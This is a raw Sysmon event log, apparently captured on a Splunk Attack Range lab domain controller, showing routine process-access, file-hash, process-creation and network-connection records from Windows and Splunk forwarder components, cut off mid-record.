12:10:04.078{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.078{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.078{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.078{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.078{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.078{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.062{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.062{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x800000000000000011343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:05.515{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D14E00BEC799A07A8AB7BFA4098D7C5,SHA256=6D23379380BA08694386AF0D7834D6AB8E2C47422D4BCF67E6E6DCAAD29F250B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:06.547{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23F5341F8D9E91F08C244CD9EE56BA81,SHA256=F0E45622534932D22F0A09E7D191489A4C6F28D65A056A9926A465462556C897,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:06.484{266CAFBE-669E-6064-7E01-00000000AE01}48683816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:06.328{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-669E-6064-7E01-00000000AE01}4868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:06.328{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:06.328{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:06.328{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:06.328{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:06.328{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-669E-6064-7E01-00000000AE01}4868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:06.328{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-669E-6064-7E01-00000000AE01}4868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:06.329{266CAFBE-669E-6064-7E01-00000000AE01}4868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000011344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.459{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53719-false10.0.1.12-8000- 10341000x800000000000000011373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.843{266CAFBE-669F-6064-8001-00000000AE01}60086024C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.671{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-669F-6064-8001-00000000AE01}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.671{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.671{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.671{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.671{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.671{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-669F-6064-8001-00000000AE01}6008C:\Program 